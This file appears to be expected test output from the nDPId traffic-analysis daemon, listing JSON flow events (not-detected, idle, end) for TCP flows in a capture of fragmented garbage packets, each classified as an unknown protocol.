00586{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9077,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244025305,"flow_last_seen":1534244025305,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1534244033211,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":9253,"dst_port":24102,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00602{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":9077,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244032298,"flow_last_seen":1534244032298,"flow_idle_time":7440000,"flow_min_l4_payload_len":4,"flow_max_l4_payload_len":4,"flow_tot_l4_payload_len":4,"flow_avg_l4_payload_len":4,"midstream":0,"thread_ts_msec":1534244033211,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":9251,"dst_port":9770,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":9077,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244032298,"flow_last_seen":1534244032298,"flow_idle_time":7440000,"flow_min_l4_payload_len":4,"flow_max_l4_payload_len":4,"flow_tot_l4_payload_len":4,"flow_avg_l4_payload_len":4,"midstream":0,"thread_ts_msec":1534244033211,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":9251,"dst_port":9770,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00604{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":9077,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244031993,"flow_last_seen":1534244031993,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1534244033211,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":29799,"dst_port":26228,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
00589{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":9077,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244031993,"flow_last_seen":1534244031993,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1534244033211,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":29799,"dst_port":26228,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00603{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":9077,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244025912,"flow_last_seen":1534244025912,"flow_idle_time":7440000,"flow_min_l4_payload_len":4,"flow_max_l4_payload_len":4,"flow_tot_l4_payload_len":4,"flow_avg_l4_payload_len":4,"midstream":1,"thread_ts_msec":1534244033211,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":21029,"dst_port":22878,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
00588{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":9077,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244025912,"flow_last_seen":1534244025912,"flow_idle_time":7440000,"flow_min_l4_payload_len":4,"flow_max_l4_payload_len":4,"flow_tot_l4_payload_len":4,"flow_avg_l4_payload_len":4,"midstream":1,"thread_ts_msec":1534244033211,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":21029,"dst_port":22878,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00604{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":9077,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244033211,"flow_last_seen":1534244033211,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1534244033211,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":10792,"dst_port":10790,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
00589{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":9077,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244033211,"flow_last_seen":1534244033211,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1534244033211,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":10792,"dst_port":10790,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00603{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":9077,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244028953,"flow_last_seen":1534244028953,"flow_idle_time":7440000,"flow_min_l4_payload_len":4,"flow_max_l4_payload_len":4,"flow_tot_l4_payload_len":4,"flow_avg_l4_payload_len":4,"midstream":1,"thread_ts_msec":1534244033211,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":2612,"dst_port":12849,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
00587{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9077,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244028953,"flow_last_seen":1534244028953,"flow_idle_time":7440000,"flow_min_l4_payload_len":4,"flow_max_l4_payload_len":4,"flow_tot_l4_payload_len":4,"flow_avg_l4_payload_len":4,"midstream":1,"thread_ts_msec":1534244033211,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":2612,"dst_port":12849,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00604{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":9077,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244028041,"flow_last_seen":1534244028041,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1534244033211,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":13105,"dst_port":14648,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
00588{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9077,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244028041,"flow_last_seen":1534244028041,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1534244033211,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":13105,"dst_port":14648,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00604{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":9077,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244030777,"flow_last_seen":1534244030777,"flow_idle_time":7440000,"flow_min_l4_payload_len":4,"flow_max_l4_payload_len":4,"flow_tot_l4_payload_len":4,"flow_avg_l4_payload_len":4,"midstream":1,"thread_ts_msec":1534244033211,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":13362,"dst_port":12596,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
00588{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9077,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244030777,"flow_last_seen":1534244030777,"flow_idle_time":7440000,"flow_min_l4_payload_len":4,"flow_max_l4_payload_len":4,"flow_tot_l4_payload_len":4,"flow_avg_l4_payload_len":4,"midstream":1,"thread_ts_msec":1534244033211,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":13362,"dst_port":12596,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00604{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":9077,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244029559,"flow_last_seen":1534244029559,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1534244033211,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":19273,"dst_port":19016,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
00589{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":9077,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244029559,"flow_last_seen":1534244029559,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1534244033211,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":19273,"dst_port":19016,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00603{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":9077,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244029864,"flow_last_seen":1534244029864,"flow_idle_time":7440000,"flow_min_l4_payload_len":4,"flow_max_l4_payload_len":4,"flow_tot_l4_payload_len":4,"flow_avg_l4_payload_len":4,"midstream":1,"thread_ts_msec":1534244033211,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":9566,"dst_port":18498,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
00587{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9077,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244029864,"flow_last_seen":1534244029864,"flow_idle_time":7440000,"flow_min_l4_payload_len":4,"flow_max_l4_payload_len":4,"flow_tot_l4_payload_len":4,"flow_avg_l4_payload_len":4,"midstream":1,"thread_ts_msec":1534244033211,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":9566,"dst_port":18498,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00604{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":9077,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244030168,"flow_last_seen":1534244030168,"flow_idle_time":7440000,"flow_min_l4_payload_len":4,"flow_max_l4_payload_len":4,"flow_tot_l4_payload_len":4,"flow_avg_l4_payload_len":4,"midstream":0,"thread_ts_msec":1534244033211,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":11892,"dst_port":26470,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
00588{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9077,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244030168,"flow_last_seen":1534244030168,"flow_idle_time":7440000,"flow_min_l4_payload_len":4,"flow_max_l4_payload_len":4,"flow_tot_l4_payload_len":4,"flow_avg_l4_payload_len":4,"midstream":0,"thread_ts_msec":1534244033211,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":11892,"dst_port":26470,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00604{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":9077,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244028649,"flow_last_seen":1534244028649,"flow_idle_time":7440000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":1,"thread_ts_msec":1534244033211,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":17458,"dst_port":10790,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
00588{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9077,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244028649,"flow_last_seen":1534244028649,"flow_idle_time":7440000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":1,"thread_ts_msec":1534244033211,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":17458,"dst_port":10790,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00603{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":9077,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244027129,"flow_last_seen":1534244027129,"flow_idle_time":7440000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":1,"thread_ts_msec":1534244033211,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":13617,"dst_port":10536,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
00587{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9077,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244027129,"flow_last_seen":1534244027129,"flow_idle_time":7440000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":1,"thread_ts_msec":1534244033211,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":13617,"dst_port":10536,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00604{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":9077,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244031080,"flow_last_seen":1534244031080,"flow_idle_time":7440000,"flow_min_l4_payload_len":4,"flow_max_l4_payload_len":4,"flow_tot_l4_payload_len":4,"flow_avg_l4_payload_len":4,"midstream":1,"thread_ts_msec":1534244033211,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":18258,"dst_port":16199,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
00588{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9077,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244031080,"flow_last_seen":1534244031080,"flow_idle_time":7440000,"flow_min_l4_payload_len":4,"flow_max_l4_payload_len":4,"flow_tot_l4_payload_len":4,"flow_avg_l4_payload_len":4,"midstream":1,"thread_ts_msec":1534244033211,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":18258,"dst_port":16199,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00603{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":9077,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244025609,"flow_last_seen":1534244025609,"flow_idle_time":7560000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1534244033211,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":16417,"dst_port":16419,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
00587{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9077,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244025609,"flow_last_seen":1534244025609,"flow_idle_time":7560000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1534244033211,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":16417,"dst_port":16419,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00601{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":9077,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244026825,"flow_last_seen":1534244026825,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1534244033211,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":9508,"dst_port":8995,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":9077,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244026825,"flow_last_seen":1534244026825,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1534244033211,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":9508,"dst_port":8995,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00602{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":9077,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244030473,"flow_last_seen":1534244030473,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1534244033211,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":9508,"dst_port":8998,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":9077,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244030473,"flow_last_seen":1534244030473,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1534244033211,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":9508,"dst_port":8998,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00603{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":9077,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244026521,"flow_last_seen":1534244026521,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1534244033211,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":10790,"dst_port":24101,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
00587{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9077,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244026521,"flow_last_seen":1534244026521,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1534244033211,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":10790,"dst_port":24101,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00603{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":9077,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244024697,"flow_last_seen":1534244024697,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1534244033211,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":24102,"dst_port":10792,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
00587{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9077,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244024697,"flow_last_seen":1534244024697,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1534244033211,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":24102,"dst_port":10792,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00603{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":9077,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244025001,"flow_last_seen":1534244025001,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1534244033211,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":18730,"dst_port":20304,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
00587{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9077,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244025001,"flow_last_seen":1534244025001,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1534244033211,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":18730,"dst_port":20304,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00604{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":9077,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244031688,"flow_last_seen":1534244031688,"flow_idle_time":7560000,"flow_min_l4_payload_len":4,"flow_max_l4_payload_len":4,"flow_tot_l4_payload_len":4,"flow_avg_l4_payload_len":4,"midstream":1,"thread_ts_msec":1534244033211,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":24136,"dst_port":16967,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
00588{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9077,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244031688,"flow_last_seen":1534244031688,"flow_idle_time":7560000,"flow_min_l4_payload_len":4,"flow_max_l4_payload_len":4,"flow_tot_l4_payload_len":4,"flow_avg_l4_payload_len":4,"midstream":1,"thread_ts_msec":1534244033211,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":24136,"dst_port":16967,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00603{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":9077,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244032602,"flow_last_seen":1534244032602,"flow_idle_time":7560000,"flow_min_l4_payload_len":4,"flow_max_l4_payload_len":4,"flow_tot_l4_payload_len":4,"flow_avg_l4_payload_len":4,"midstream":0,"thread_ts_msec":1534244033211,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":17751,"dst_port":9024,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
00588{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":9077,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244032602,"flow_last_seen":1534244032602,"flow_idle_time":7560000,"flow_min_l4_payload_len":4,"flow_max_l4_payload_len":4,"flow_tot_l4_payload_len":4,"flow_avg_l4_payload_len":4,"midstream":0,"thread_ts_msec":1534244033211,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":17751,"dst_port":9024,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00604{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":9077,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244027433,"flow_last_seen":1534244027433,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1534244033211,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":14387,"dst_port":14646,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
00588{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9077,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244027433,"flow_last_seen":1534244027433,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1534244033211,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":14387,"dst_port":14646,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00604{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":9077,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244029256,"flow_last_seen":1534244029256,"flow_idle_time":7560000,"flow_min_l4_payload_len":4,"flow_max_l4_payload_len":4,"flow_tot_l4_payload_len":4,"flow_avg_l4_payload_len":4,"midstream":0,"thread_ts_msec":1534244033211,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":16199,"dst_port":21055,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
